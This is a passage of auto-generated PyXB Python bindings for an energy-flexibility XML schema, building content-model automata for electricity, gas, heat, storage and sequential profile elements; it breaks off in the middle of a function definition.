# Declare StorageUsageProfile's repeated 'element' child (type CTD_ANON_).
StorageUsageProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'element'), CTD_ANON_, scope=StorageUsageProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 146, 3)))
def _BuildAutomaton_3 ():
    """Build the content-model automaton for StorageUsageProfile: a
    repeating 'element' child, modelled as one accepting state that
    loops back onto itself.
    """
    # One-shot helper: unbind it from the module namespace once it has run.
    global _BuildAutomaton_3
    del _BuildAutomaton_3
    import pyxb.utils.fac as fac
    element_use = pyxb.binding.content.ElementUse(StorageUsageProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'element')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 146, 3))
    loop_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    loop_state._set_transitionSet([fac.Transition(loop_state, [])])
    return fac.Automaton([loop_state], set(), False, containing_state=None)
StorageUsageProfile._Automaton = _BuildAutomaton_3()
# Declare StorageUsageProbabilityProfile's repeated 'usageRateElement' child.
StorageUsageProbabilityProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'usageRateElement'), ProbabilityAttributesWithDuration, scope=StorageUsageProbabilityProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 156, 3)))
def _BuildAutomaton_4 ():
    """Build the content-model automaton for StorageUsageProbabilityProfile:
    a repeating 'usageRateElement' child — one accepting state with a
    self-transition.
    """
    # One-shot helper: unbind it from the module namespace once it has run.
    global _BuildAutomaton_4
    del _BuildAutomaton_4
    import pyxb.utils.fac as fac
    element_use = pyxb.binding.content.ElementUse(StorageUsageProbabilityProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'usageRateElement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 156, 3))
    loop_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    loop_state._set_transitionSet([fac.Transition(loop_state, [])])
    return fac.Automaton([loop_state], set(), False, containing_state=None)
StorageUsageProbabilityProfile._Automaton = _BuildAutomaton_4()
# Declare ElectricityProfile's repeated 'element' child (type CTD_ANON_2).
ElectricityProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'element'), CTD_ANON_2, scope=ElectricityProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 161, 3)))
def _BuildAutomaton_5 ():
    """Build the content-model automaton for ElectricityProfile: a
    repeating 'element' child — one accepting state with a self-transition.
    """
    # One-shot helper: unbind it from the module namespace once it has run.
    global _BuildAutomaton_5
    del _BuildAutomaton_5
    import pyxb.utils.fac as fac
    element_use = pyxb.binding.content.ElementUse(ElectricityProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'element')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 161, 3))
    loop_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    loop_state._set_transitionSet([fac.Transition(loop_state, [])])
    return fac.Automaton([loop_state], set(), False, containing_state=None)
ElectricityProfile._Automaton = _BuildAutomaton_5()
# Declare ElectricityProbabilityProfile's repeated 'powerElement' child.
ElectricityProbabilityProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'powerElement'), ProbabilityAttributesWithDuration, scope=ElectricityProbabilityProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 171, 3)))
def _BuildAutomaton_6 ():
    """Build the content-model automaton for ElectricityProbabilityProfile:
    a repeating 'powerElement' child — one accepting state with a
    self-transition.
    """
    # One-shot helper: unbind it from the module namespace once it has run.
    global _BuildAutomaton_6
    del _BuildAutomaton_6
    import pyxb.utils.fac as fac
    element_use = pyxb.binding.content.ElementUse(ElectricityProbabilityProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'powerElement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 171, 3))
    loop_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    loop_state._set_transitionSet([fac.Transition(loop_state, [])])
    return fac.Automaton([loop_state], set(), False, containing_state=None)
ElectricityProbabilityProfile._Automaton = _BuildAutomaton_6()
# Declare GasProfile's repeated 'element' child (type CTD_ANON_3).
GasProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'element'), CTD_ANON_3, scope=GasProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 176, 3)))
def _BuildAutomaton_7 ():
    """Build the content-model automaton for GasProfile: a repeating
    'element' child — one accepting state with a self-transition.
    """
    # One-shot helper: unbind it from the module namespace once it has run.
    global _BuildAutomaton_7
    del _BuildAutomaton_7
    import pyxb.utils.fac as fac
    element_use = pyxb.binding.content.ElementUse(GasProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'element')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 176, 3))
    loop_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    loop_state._set_transitionSet([fac.Transition(loop_state, [])])
    return fac.Automaton([loop_state], set(), False, containing_state=None)
GasProfile._Automaton = _BuildAutomaton_7()
# Declare GasProbabilityProfile's repeated 'flowRateElement' child.
GasProbabilityProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'flowRateElement'), ProbabilityAttributesWithDuration, scope=GasProbabilityProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 186, 3)))
def _BuildAutomaton_8 ():
    """Build the content-model automaton for GasProbabilityProfile: a
    repeating 'flowRateElement' child — one accepting state with a
    self-transition.
    """
    # One-shot helper: unbind it from the module namespace once it has run.
    global _BuildAutomaton_8
    del _BuildAutomaton_8
    import pyxb.utils.fac as fac
    element_use = pyxb.binding.content.ElementUse(GasProbabilityProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flowRateElement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 186, 3))
    loop_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    loop_state._set_transitionSet([fac.Transition(loop_state, [])])
    return fac.Automaton([loop_state], set(), False, containing_state=None)
GasProbabilityProfile._Automaton = _BuildAutomaton_8()
# Declare HeatProfile's repeated 'element' child (type CTD_ANON_4).
HeatProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'element'), CTD_ANON_4, scope=HeatProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 191, 3)))
def _BuildAutomaton_9 ():
    """Build the content-model automaton for HeatProfile: a repeating
    'element' child — one accepting state with a self-transition.
    """
    # One-shot helper: unbind it from the module namespace once it has run.
    global _BuildAutomaton_9
    del _BuildAutomaton_9
    import pyxb.utils.fac as fac
    element_use = pyxb.binding.content.ElementUse(HeatProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'element')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 191, 3))
    loop_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    loop_state._set_transitionSet([fac.Transition(loop_state, [])])
    return fac.Automaton([loop_state], set(), False, containing_state=None)
HeatProfile._Automaton = _BuildAutomaton_9()
# Declare HeatProbabilityProfile's repeated 'element' child (type CTD_ANON_5).
HeatProbabilityProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'element'), CTD_ANON_5, scope=HeatProbabilityProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 203, 3)))
def _BuildAutomaton_10 ():
    """Build the content-model automaton for HeatProbabilityProfile: a
    repeating 'element' child — one accepting state with a self-transition.
    """
    # One-shot helper: unbind it from the module namespace once it has run.
    global _BuildAutomaton_10
    del _BuildAutomaton_10
    import pyxb.utils.fac as fac
    element_use = pyxb.binding.content.ElementUse(HeatProbabilityProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'element')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 203, 3))
    loop_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    loop_state._set_transitionSet([fac.Transition(loop_state, [])])
    return fac.Automaton([loop_state], set(), False, containing_state=None)
HeatProbabilityProfile._Automaton = _BuildAutomaton_10()
# Children of CTD_ANON_5: 'temperature', 'flowRate' and 'thermalPower',
# each of type ProbabilityAttributes and each occurrence-bounded by the
# counters built below.
CTD_ANON_5._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'temperature'), ProbabilityAttributes, scope=CTD_ANON_5, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 206, 6)))
CTD_ANON_5._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'flowRate'), ProbabilityAttributes, scope=CTD_ANON_5, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 207, 6)))
CTD_ANON_5._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'thermalPower'), ProbabilityAttributes, scope=CTD_ANON_5, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 208, 6)))
def _BuildAutomaton_11 ():
    # Build the automaton for CTD_ANON_5. All three states are initial and
    # the automaton is nullable (third Automaton argument is True), so any
    # of the children may start the content and the whole model may be empty.
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_11
    del _BuildAutomaton_11
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0/cc_1/cc_2: occurrence counters (min=0, max=1) for 'temperature',
    # 'flowRate' and 'thermalPower' respectively (XSD lines 206-208).
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 206, 6))
    counters.add(cc_0)
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 207, 6))
    counters.add(cc_1)
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 208, 6))
    counters.add(cc_2)
    states = []
    # st_0: 'temperature'.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_5._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'temperature')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 206, 6))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: 'flowRate'.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_5._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 207, 6))
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: 'thermalPower'.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_5._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'thermalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 208, 6))
    st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # st_0 may repeat within cc_0 or advance to st_1/st_2 (closing cc_0).
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_0._set_transitionSet(transitions)
    # st_1 may repeat within cc_1 or advance to st_2 (closing cc_1).
    transitions = []
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_1._set_transitionSet(transitions)
    # st_2 may repeat within cc_2 only.
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_2, True) ]))
    st_2._set_transitionSet(transitions)
    return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_5._Automaton = _BuildAutomaton_11()
# Declare SupportedCommodities' repeated 'commodityType' child (CommodityEnum).
SupportedCommodities._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'commodityType'), CommodityEnum, scope=SupportedCommodities, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 228, 3)))
def _BuildAutomaton_12 ():
    """Build the content-model automaton for SupportedCommodities: a
    repeating 'commodityType' child — one accepting state with a
    self-transition.
    """
    # One-shot helper: unbind it from the module namespace once it has run.
    global _BuildAutomaton_12
    del _BuildAutomaton_12
    import pyxb.utils.fac as fac
    element_use = pyxb.binding.content.ElementUse(SupportedCommodities._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'commodityType')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 228, 3))
    loop_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    loop_state._set_transitionSet([fac.Transition(loop_state, [])])
    return fac.Automaton([loop_state], set(), False, containing_state=None)
SupportedCommodities._Automaton = _BuildAutomaton_12()
# Declare CurtailmentOptions' repeated 'curtailmentOption' child.
CurtailmentOptions._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'curtailmentOption'), CurtailmentOption, scope=CurtailmentOptions, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 233, 3)))
def _BuildAutomaton_13 ():
    """Build the content-model automaton for CurtailmentOptions.

    A 'curtailmentOption' child bounded by an unbounded counter
    (min=0, max=None): one accepting state looping on itself while
    incrementing the counter; the automaton itself is nullable.
    """
    # One-shot helper: unbind it from the module namespace once it has run.
    global _BuildAutomaton_13
    del _BuildAutomaton_13
    import pyxb.utils.fac as fac
    occurrences = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 233, 3))
    option_use = pyxb.binding.content.ElementUse(CurtailmentOptions._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'curtailmentOption')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 233, 3))
    final_update = set()
    final_update.add(fac.UpdateInstruction(occurrences, False))
    loop_state = fac.State(option_use, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    loop_state._set_transitionSet([fac.Transition(loop_state, [fac.UpdateInstruction(occurrences, True)])])
    return fac.Automaton([loop_state], {occurrences}, True, containing_state=None)
CurtailmentOptions._Automaton = _BuildAutomaton_13()
# Children of ProfileContainer: three pairs of alternatives —
# electricity (profile / probability profile), gas, and heat — each pair
# sharing one occurrence counter in the automaton below.
ProfileContainer._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricityProfile'), ElectricityProfile, scope=ProfileContainer, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 294, 4)))
ProfileContainer._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricityProbabilityProfile'), ElectricityProbabilityProfile, scope=ProfileContainer, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 295, 4)))
ProfileContainer._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasProfile'), GasProfile, scope=ProfileContainer, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 298, 4)))
ProfileContainer._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasProbabilityProfile'), GasProbabilityProfile, scope=ProfileContainer, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 299, 4)))
ProfileContainer._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatProfile'), HeatProfile, scope=ProfileContainer, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 302, 4)))
ProfileContainer._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatProbabilityProfile'), HeatProbabilityProfile, scope=ProfileContainer, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 303, 4)))
def _BuildAutomaton_14 ():
    # Build the automaton for ProfileContainer. Every state is initial and
    # the automaton is nullable (third Automaton argument is True).
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_14
    del _BuildAutomaton_14
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0 (XSD 293): bound (min=0, max=1) shared by the electricity states.
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 293, 3))
    counters.add(cc_0)
    # cc_1 (XSD 297): bound (min=0, max=1) shared by the gas states.
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 297, 3))
    counters.add(cc_1)
    # cc_2 (XSD 301): bound (min=0, max=1) shared by the heat states.
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 301, 3))
    counters.add(cc_2)
    states = []
    # st_0: 'electricityProfile' (closes cc_0 on acceptance).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(ProfileContainer._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 294, 4))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: 'electricityProbabilityProfile' (also governed by cc_0).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(ProfileContainer._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricityProbabilityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 295, 4))
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: 'gasProfile' (governed by cc_1).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(ProfileContainer._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 298, 4))
    st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # st_3: 'gasProbabilityProfile' (also governed by cc_1).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(ProfileContainer._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasProbabilityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 299, 4))
    st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # st_4: 'heatProfile' (governed by cc_2).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(ProfileContainer._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 302, 4))
    st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    # st_5: 'heatProbabilityProfile' (also governed by cc_2).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(ProfileContainer._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatProbabilityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 303, 4))
    st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_5)
    # From the electricity states: stay within the pair (increment cc_0)
    # or advance to gas/heat states (close cc_0).
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_1._set_transitionSet(transitions)
    # From the gas states: stay within the pair (increment cc_1) or
    # advance to the heat states (close cc_1).
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_3._set_transitionSet(transitions)
    # From the heat states: only movement within the pair (increment cc_2).
    transitions = []
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_2, True) ]))
    st_4._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_2, True) ]))
    st_5._set_transitionSet(transitions)
    return fac.Automaton(states, counters, True, containing_state=None)
ProfileContainer._Automaton = _BuildAutomaton_14()
# Children of SequentialProfile: 'maxIntervalBefore' (xs:duration) followed
# by 'sequentialProfileAlternatives'.
SequentialProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'maxIntervalBefore'), pyxb.binding.datatypes.duration, scope=SequentialProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 353, 3)))
SequentialProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileAlternatives'), SequentialProfileAlternatives, scope=SequentialProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 354, 3)))
def _BuildAutomaton_15 ():
    # Build the two-state sequence automaton for SequentialProfile.
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_15
    del _BuildAutomaton_15
    import pyxb.utils.fac as fac
    counters = set()
    states = []
    # st_0 ('maxIntervalBefore'): final_update is None — the content model
    # may not terminate here; 'sequentialProfileAlternatives' must follow.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(SequentialProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'maxIntervalBefore')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 353, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1 ('sequentialProfileAlternatives'): accepting, terminal.
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(SequentialProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileAlternatives')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 354, 3))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # Only legal move: st_0 -> st_1.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    st_1._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
SequentialProfile._Automaton = _BuildAutomaton_15()
# Declare SequentialProfileAlternatives' repeated 'sequentialProfileAlternative' child.
SequentialProfileAlternatives._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileAlternative'), SequentialProfileAlternative, scope=SequentialProfileAlternatives, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 367, 3)))
def _BuildAutomaton_16 ():
    """Build the content-model automaton for SequentialProfileAlternatives:
    a repeating 'sequentialProfileAlternative' child — one accepting state
    with a self-transition.
    """
    # One-shot helper: unbind it from the module namespace once it has run.
    global _BuildAutomaton_16
    del _BuildAutomaton_16
    import pyxb.utils.fac as fac
    element_use = pyxb.binding.content.ElementUse(SequentialProfileAlternatives._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileAlternative')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 367, 3))
    loop_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    loop_state._set_transitionSet([fac.Transition(loop_state, [])])
    return fac.Automaton([loop_state], set(), False, containing_state=None)
SequentialProfileAlternatives._Automaton = _BuildAutomaton_16()
# Declare SequentialProfiles' repeated 'sequentialProfile' child.
SequentialProfiles._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfile'), SequentialProfile, scope=SequentialProfiles, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 372, 3)))
def _BuildAutomaton_17 ():
    """Build the content-model automaton for SequentialProfiles: a
    repeating 'sequentialProfile' child — one accepting state with a
    self-transition.
    """
    # One-shot helper: unbind it from the module namespace once it has run.
    global _BuildAutomaton_17
    del _BuildAutomaton_17
    import pyxb.utils.fac as fac
    element_use = pyxb.binding.content.ElementUse(SequentialProfiles._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 372, 3))
    loop_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    loop_state._set_transitionSet([fac.Transition(loop_state, [])])
    return fac.Automaton([loop_state], set(), False, containing_state=None)
SequentialProfiles._Automaton = _BuildAutomaton_17()
# Children of SequentialProfileInstruction: 'sequenceNr' (xs:int),
# 'alternativeNr' (xs:int) and 'startTime' (xs:dateTime), in that order.
SequentialProfileInstruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequenceNr'), pyxb.binding.datatypes.int, scope=SequentialProfileInstruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 389, 3)))
SequentialProfileInstruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'alternativeNr'), pyxb.binding.datatypes.int, scope=SequentialProfileInstruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 390, 3)))
SequentialProfileInstruction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'startTime'), pyxb.binding.datatypes.dateTime, scope=SequentialProfileInstruction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 391, 3)))
def _BuildAutomaton_18 ():
    # Build the three-state chain automaton for SequentialProfileInstruction:
    # sequenceNr -> alternativeNr -> startTime, each step mandatory.
